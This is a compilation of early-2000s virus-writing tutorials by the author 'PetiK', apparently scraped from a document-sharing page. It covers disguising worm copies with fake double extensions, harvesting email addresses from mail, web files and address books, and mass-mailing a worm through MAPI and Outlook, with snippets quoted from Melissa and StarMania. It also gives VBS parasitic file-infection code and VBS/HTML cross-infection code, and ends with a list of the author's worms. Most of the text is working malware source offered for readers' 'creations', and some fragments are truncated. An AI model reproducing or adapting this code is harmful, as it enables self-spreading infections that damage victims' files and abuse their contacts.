<TD noWrap vAlign=top width=>
6 <Pentasm99@aol.com>
7 <Pentasm99@aol.com screenname=>
...
...
*******************************************************************************************************************
*****
We can see of course some problems:

- <VBS.Ketip.A@mm> : not a real EMail but a Norton Worm Name
- <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR>:
<TR class=aolmailheader> : The scan doesn't found immediatly the '"' string.
<TD noWrap vAlign=top width=> :
- <Pentasm99@aol.com screenname=> : IDEM. It was not '"' the end of the mail but a space (20h)
##########################
# RANDOM NAME GENERATOR: #
##########################
Like I said in my last article about "Hide a copy a of worm" we are going to make the same thing in VBS.
1) tmpname="" ' Value of tmpname is NULL
2) randomize(timer) ' Random size of the first part of name
namel=int(rnd(1)*20)+1 ' between 1 and 20.
3) For lettre = 1 To namel ' Put the letter.
randomize(timer) ' 97 : Start from "a" (65 : Start from "A")
tmpname=tmpname & chr(int(rnd(1)*26)+97) ' 26 : from "a-A" to "z-Z"
Next ' for number 26 => 9 and 97 => 48
4) typext = "execombatbmpjpggifdocxlsppthtmhtthta" ' Now we choice an extension between 12 differents.
randomize(timer)
5) tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs" ' And we have the result
Code Source:
*******************************************************************************************************************
*****
tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
MsgBox tmpname
*******************************************************************************************************************
*****
Some Examples:
mhrmhoulleyl.htm.vbs
rlvqmtyppjcbho.bat.vbs
PREYXUDBNYKNLRSALL.DOC.VBS
869768177527247364.gif.vbs
...
...
This technics is extra to change name of worms copy ineach start (look at my last article)
###############
# CONCLUSION: #
###############
This is the end of the article. I hope that it help you in your creations and research.
If you have any suggestions or comments, please mail me to petikvx@aol.com
PetiK (www.petikvx.fr.fm)
=== Three ways of spread ===
=== by PetiK (05/20/2002) ===
################
# Introducion: #
################
I present in this article the tree mains ways that I use to spread my worms.
##############
# Read Mail: #
##############
I use this first way to code a worm in C++. It is a simple syntax. For this we use
MAPI function : FindNext, ReadMail, SendMail and FreeBuffer
First of all "prepare" the APIs :

Then "call" the APIs :
And at the end the syntax to read the mail, take email and send the mail :
// Initialize MAPI
// Find the first mail

do {
// Read the mail

if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS)
{
// Here we take the "name" and the "email" of the guy who send the mail
mes->ulReserved=0;
mes->lpszSubject="Subject of worm";
mes->lpszNoteText="Body of Worm.";
mes->nRecipCount=1;
// Here is the new email

mes->nFileCount=1;
mes->lpFiles->lpszPathName="C:\WINDOWS\worm.exe";
mes->lpFiles->lpszFileName="othername.exe";
}
// Find the next mail

free(mes->lpFiles);
mFreeBuffer(mes);
// Close MAPI
FreeLibrary(hMAPI);
}
I you can use this function in VBS (or VB), very good (and mail me).
************************************************************************************************
#####################
# "mailto:" string: #
#####################
I'm going to explain how use this way in 3 differents languages
{Win32Asm}
I took the code from my worm I-Worm.Gamma
1st: Open the file
call CreateFileA
inc eax
je END_S
dec eax
xchg eax,ebx
2nd: Map the File
push PAGE_READONLY
push 0
push ebx
call CreateFileMappingA
test eax,eax
jz FERME1
3rd:
push FILE_MAP_READ
push ebp
call MapViewOfFile
test eax,eax
jz FERME2
xchg eax,esi
ls_s_m: call @mt

db 'mailto:'
@mt: pop edi
l_s_m: pushad
push 07h
pop ecx
rep cmpsb ; We compare 7 bytes with "mailto:" string
popad
je s_m
inc esi
loop l_s_m
FERME3: push esi

call UnmapViewOfFile
FERME2: push ebp
call CloseHandle
FERME1: push ebx
call CloseHandle
popad
ret
s_m: xor edx,edx

add esi,7
mov edi,offset mail_address ; and we stock the email in the
push edi ; mail_address offset = EDI
n_c: lodsb
cmp al,' '
je s_c
cmp al,'"' ; If charachter = "
je e_c
cmp al,'''' ; or charachter = ', it is the end of the mail
je e_c
cmp al,'@' ; control if exists @
jne o_a
inc edx
o_a: stosb
jmp n_c
s_c: inc esi
jmp n_c
e_c: xor al,al
stosb
pop edi
test edx,edx ; no @ ?? no valid email.
je other_file
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
{C++}
In C++, there is three parts.
First : FindFile
hFile=FindFirstFile(ext,&ffile); //
if(hFile!=INVALID_HANDLE_VALUE) { //
while(abc) { //
GetMail(ffile.cFileName,mail); //
if(strlen(mail)>0) { // NO COMMENTS !
sendmail(mail); //
} //
abc=FindNextFile(hFile,&ffile); //
} //
} //
Second : Get the EMail

{
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
return; // Like in Win32Asm :
size=GetFileSize(hf,NULL); // Open File
if(!size)
return; // Empty ?? Close it
size-=100;
if(!hf2) {
CloseHandle(hf); // Map the file
return;
}
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) { // If "mailto:" string exists ??
test=TRUE;
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) { // Until " or ' charachter
mail[k]=mapped[i];
k++;
if(mapped[i]=='@') // Check @ charachter
valid=TRUE;
}
i++;
}
mail[k]=0; // and stock email in mail offset
} else
i++;
}
if(!valid)
mail[0]=0;
CloseHandle(hf2);
CloseHandle(hf);
return;
}
Third : Send the mail

{
from.lpszName=NULL;
mess.lpszSubject="Subject of mail";
mess.lpszNoteText="Body of mail";
if(!mess.lpRecips)
return;
mess.lpRecips->lpszName=tos; // Here the mail that we found
mess.nRecipCount=1;
if(!mess.lpFiles)
return;
mess.lpFiles->lpszPathName="FullName_of_the_worm.exe";
mess.lpFiles->lpszFileName="othername_of_worm.exe";
mess.nFileCount=1;
mSendMail(0,0,&mess,0,0); // Send the mail
free(mess.lpFiles);
}
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
{VBS}
Look at my article "VBS Tutorial"
************************************************************************************************
########################
# Outlook Address Book #
########################
{Win32Asm}
In the virus/worm Win32.HiV, Benny scans the default WAB file to spread.
But it was a little difficult for me. Then I coded differently.
To have the path of WAB file:
srch_wab:
mov edi,offset wab_path
push offset wab_size ; = fullname of WAB file
push edi
push offset reg
push 0
@pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" ; The name of WAB file
push 80000001h
api SHGetValueA
To open and map file, like for the HTM and HTML file (see on top).
Now, scan the file:
d_scan_mail:
call @smtp
db 'SMTP',00h,1Eh,10h,56h,3Ah ; the string what we want to find
@smtp:
pop edi
s_scan_mail:
pushad
push 9
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop s_scan_mail
....
scan_mail:
xor edx,edx
add esi,21
push edi ; EDI = EMail
p_c: lodsb
cmp al," "
je car_s
cmp al,00h
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
f_mail: xor al,al
stosb
pop edi
test edx,edx
je d_scan_mail
call send_mail
jmp d_scan_mail
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
{VBA}
I took the code from W97M.Melissa.A:
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice

Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Subject of the worm"
BreakUmOffASlice.Body = "Body of the Worm"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
{VBS}
I took the code from VBS.StarMania:
Set mapi=O.GetNameSpace("MAPI")
For Each AL In mapi.AddressLists
If AL.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AL.AddressEntries.Count
Set ALE = AL.AddressEntries(AddListCount)
Set go = O.CreateItem(0)
go.To = ALE.Address
go.Subject = "GUESS"
go.Body = "GUESS"
go.Attachments.Add(WScript.ScriptFullName)
go.DeleteAfterSubmit = True
go.Send
************************************************************************************************
###############
# Conclusion: #
###############
This is the end of this article.

If you have some questions or suggestions, please mail me to petikvx@aol.com
=== What language for which work ?? ===
=== by PetiK (06/02/2002) ===
################
# Introducion: #
################
Often new coders (like newbies) ask oneself what is the best language to code
virus - worms. So I try to present the different languages that I use to code
my works. First I present the compile languages (Win32Asm - C/C++ - VB) and
second the script language.
################
# 1) Win32asm: # THE BEST
################
It's by far the best way to code virus/worms. You can all control with this.
This language is useful for a good infection. Today, 98 % of virii are coded
in assembler. There are different ways to spread worms too.
First the MAPI functions. Look at my works (and others) to see the syntax.
Other way : SMTP. It's a good device to deceive the victims. They can believe
that an email come from a company (support@microsoft.com) or himself. But it
is a difficult language in the biginning. See, read and learn tutorials and
other viriis/worms' source.
#############
# 2) C/C++: #
#############
I learnt this language 6 months ago. Advantage, the syntax is as easy as ASM.
It's especially a language to code worms thanks to <mapi.h>.
You can spread you work by reading old mails or scan some WEB files but also
by coding a SMTP processus.
This language is equally use to code worms that use IIS server to spread like
the worm : W32.Nimda.Worm.
With this language, you can code virii/worms' linux too.
##########
# 3) VB: #
##########
Of course it's a lame language. But you can use the Outlook's Address Book to
spread your work without effort. But this sort of program are fast detected
by AV (Norton : Bloodhound.W32.VBWORM).
Personnaly, I use this language to code some tools like Virii/Worms Generator
or other things.
###########
# 4) VBS: #
###########
Very easy. I learnt this language by reading the source of VBS.ILoveYou.Worm.

You can easy make a good parasit virus and worm with Outlook's Address Book.
Remark : VBS is a Micro$oft language. So you can travel throught different
Micro$oft software like Outlook (of course) but also with Word.
If you want to read good source coded in VBS, look at Zulu homepage.
############
# 5) HTML: #
############
With this language, the most interesting are the virii. Of course you code in
VBS language (or in JavaScript). This is the same syntax. Try to find a new
sort of spreading.
###########
# 6) VBA: #
###########
If you know the VBS language, you don't will have problemz to code a macro
virus (DOC / XLS). To code macro virii is easiest thing in the VX life. So
you must find novelties (new way to infect DOC files, infect DOC/XLS files
or spread throught DOC/EXE files, etc...). Spread is easy too : Melissa.A.
###############
# Conclusion: #
###############
This is the end of this article.

If you have some questions or suggestions, please mail me to petikvx@aol.com
=== VBS/HTML multi-infection ===
=== by PetiK (06/19/2002) ====
################
# Introducion: #
################
This article present how to travel between VBS and HTML file to infect them.
There are 4 chapters : I: VBS -> VBS
II: VBS -> HTML
III: HTML-> HTML
IV: HTML-> VBS
#################
# I: VBS -> VBS #
#################
We can frequently see this in the VBS virus. There are two sort of infection:
-Overwritting : % To bad, the user sees immediatly the problem
% Crash the VBS file
So this solution is not very good.
-Parasit : % Start of the file :
**********************
* 'mark of the virus *
* *
* + *
* *
* VBS virus *
**********************
* *
* Real VBS prog *
* *
**********************
% End of the file :
**********************
* 'mark of the virus *
**********************
* *
* Real VBS prog *
* *
**********************
* *
* VBS virus *
* *
**********************
So we're going to see the code :
'mark
Set fl = fso.OpenTextFile(WScript.ScriptFullName, 1)
virus = fl.ReadAll ' Stock the virus code
fl.Close
infectfile()
Sub infectfile()
Set drv = fso.Drives
For Each d In drv ' Get the drive
If d.DriveType = 2 Or d.DriveType = 3 Then
list(d.path&"\")
End If
Next
End Sub
Sub list(doss)
Set fold = fso.GetFolder(doss)
Set yebjp = fold.SubFolders
For Each f1 In yebjp ' Get the folder
infect(f1.Path)
list(f1.Path)
Next
End Sub
Sub infect(doss)
Set zqhanx = CreateObject("Scripting.FileSystemObject")
Set lxxj = zqhanx.GetFolder(doss)
Set fc = lxxj.Files
For Each f1 In fc ' Get the files
ext = fso.GetExtensionName(f1.Path)
ext = lCase(ext)
If (ext = "vbs") Then
Set cot = fso.OpenTextFile(f1.Path, 1, False)
If cot.ReadLine <> "'mark" Then ' check is already infected
cot.Close
vbsorg = cot.ReadAll()
cot.Close
Set inf = fso.OpenTextFile(f1.Path, 2, True)
inf.WriteLine virus ' write virus code
inf.WriteLine ""
inf.WriteLine (vbsorg) ' write real code
inf.Close
End If
End If
Next
End Sub
###################
# II: VBS -> HTML #
###################
So, the idea is to put the viral code into the VBS file. How ?? by converting into hex string :
....
....
If (ext = "htm") or (ext = "html") Then
If InStr(1,cot.ReadAll(),"vbshex") = 0 Then ' check is already infected
cot.Close
Set htmf = fso.OpenTextFile(f1.Path, 8, False)
htmf.WriteLine "<SCRIPT LANGUAGE=VBSCRIPT>"
f = "vbshex="""
For i = 1 to Len(virus) ' take all char
e=Mid(virus,i,1)
e=Hex(Asc(e)) ' and convert in hex
If Len(e)=1 Then
e="0"&e 'DA -> 0D0A for VbCrLf
End If
f=f+e
Next
f=f+""""
...... NO FINISH, SEE THE fourth chapter ' Here the infection HTML -> VBS
htmf.WriteLine f
htmf.Close
End If
End If
Set htmf = fso.CreateTextFile("hello.htm",8,-2)
htmf.WriteLine "<SCRIPT LANGUAGE=VBSCRIPT>"
f = "vbshex="""
For i = 1 to Len(virus)
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
Next
f=f+""""
htmf.WriteLine f
htmf.Close
#####################
# III: HTML -> HTML #
#####################
It's a simple routine. Like in VBS (and it's in VBS).
This a part of source :

<mark> ' the mark
<html><head><title>You're title</title></head><body>
<script language=VBScript>
If err.number=429 Then ' err number if user click NO
Else
infhtm(uplobu.GetSpecialFolder(0)) ' call the infhtm function

infhtm(uplobu.GetSpecialFolder(1)) ' in specific folder (better)
infhtm(unlgeu.SpecialFolders("MyDocuments"))
End If
Function infhtm(dir)
Set ibamih=fso.GetFolder(dir)
Set vtob=ibamih.Files
For each f1 in vtob
ext=lcase(uplobu.GetExtensionName(f1.Name))
If ext="htm" or ext="html" Then ' check extension
Set eqybwx=fso.OpenTextFile(djra.path, 1, False)
If eqybwx.ReadLine <> "<mark>" Then ' already infected ??
eqybwx.Close()
Set eqybwx=fso.OpenTextFile(djra.path, 1, False)
htmorg=eqybwx.ReadAll()
eqybwx.Close()
Set virushtm=document.body.CreateTextRange
Set eqybwx=fso.CreateTextFile(djra.path, True, False)
eqybwx.WriteLine "<mark>" ' put the mark
eqybwx.Write(htmorg) ' put the real code
eqybwx.WriteLine virushtm.htmltext ' put te htm virus
eqybwx.Close()
Else
eqybwx.Close()
End If
End If
Next
End If
End Function
really simple no ??
###################
# IV: VBS -> HTML #
###################
So this is the the last part.
Look at the second part, I write
...... NO FINISH, SEE THE fourth chapter ' Here the infection HTML -> VBS
We must search here the VBS file. The same way that we infect HTM/HTML file.
In the HTML virus we have :
If ext="htm" or ext="html" Then
So we add
ElseIf ext="vbs" Then
If cot.ReadLine <> "'mark" Then ' check is already infected
cot.Close
vbsorg = cot.ReadAll()
cot.Close
----------- here we infect the VBS file -----------
For Y=1 To Len(vbshex) Step 2
virvbs = virvbs & Chr("&H" & Mid(vbshex,Y,2))
Next
Set inf = fso.OpenTextFile(f1.Path, 2, True)
inf.Write virvbs ' write virus code
inf.WriteLine ""
inf.WriteLine (vbsorg) ' write real code
inf.Close
----------- here we infect the VBS file -----------
End If
###################
# V: CONCLUSION : #
###################
This is the end of the article. If you have some suggestions or new ideas, please mail me to
petikvx@aol.fr.
PetiK/[b8] (www.petikvx.fr.fm)

PetiKArchiver1 0

Uploaded by

Copyright:

Available Formats

You might also like

PetiKArchiver1 0

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

PetiKArchiver1 0

Uploaded by

Copyright:

Available Formats

PetiK Archiver

NEW : FORUM FOR ALL VXERS : CLICK HERE

PLEASE SIGN MY GUESTBOOK : CLICK HERE

It's a DOS worm. It uses mIRC to

A BAT file which uses mIRC to

CryptoText 06/20/2002 Coded in VB6. Encrypt ASCII file.

It is script that uses ActiveX

HTML.Linda 02/24/2002 Lame love worm.

Infect htm,html,htt,hta and asp

My first virus for rRlf group.

It‘s a utility which detect

I-Worm.Dandelion 11/16/2001 UNRELEASED WORM

I-Worm.Falken 07/02/2002 First WGAA Worm. WARNING !

Spread with a randome VBS file in

Infect C???????.exe. Scans some

Sophos : W32/Petik-K Uses MAPI function to spread.

It's my first worm. It uses

Modify "Exclude.dat" in the

Copy all mail of Outlook Address

Not bugz for MAPI functions.

I-Worm.Together 03/15/2002 W32.Pet_Tick.AC@mm Kill some AV. 100% assembler.

Sophos : W32/Petik-WTC A Worm against the terrorism.

JS.Lamnireg.A Trojan It infects JS file in \WINDOWS,

Coded with alc0paul and spread

VB.DocTor.Worm 06/22/2002 It spread by infecting DOC files

This worm spread by scaning the

My first worm coded in Visual

A worm which spread in a local

This virus infects VBS and DOC

This worm/virus infects VBS files

VBS.GoodBye 12/01/2001 UNRELEASED WORM

Encrypt with my tool “PetiK’s VBS

Use ftp to download a file (virus

VBS.Park 06/24/2002 A VBS/HTML multi-infection virus

It arrives as an HTML email

VBS.ManiaStar.A@mm It infects all VBS files in

Infect ZIP files in certain

My very first (and last) worm

W32.HLLW.LiteLo 03/10/2002 A lame HLL worm.

Open *.ht* file to find some

W97M.Comical This worm uses VBA and W32asm to

Spread via HTML files by

This virus infects RAR files

Uses some API to infect Word

A large spreading. Export “Sleep”

Infect .doc files with the “Wolf”

A selection of the best virii sites :

VirLinux : http://www.virlinux.fr.fm A French site about virii’s Linux

DEBUT : mov ah,09h ;affiche un message

TOUCHE: mov ah,1 ;lecture du caractŠre

CREER_FICHIER: mov ah,3Ch ;CREE UN FICHIER

MESSAGE: mov ah,09h ;AFFICHE LE MESSAGE

FIN_PROGRAMME : mov ah,4Ch ;FERME LE PROGRAMME

text1 db 10,13,'Tape C pour continuer ou Q pour quitter : $'

meslen equ $-note

TOUT_DEBUT: jmp FILE1

VERIFICATION: mov ah,2Ah

Open .ht file to find some

* * * * * * * * * ** *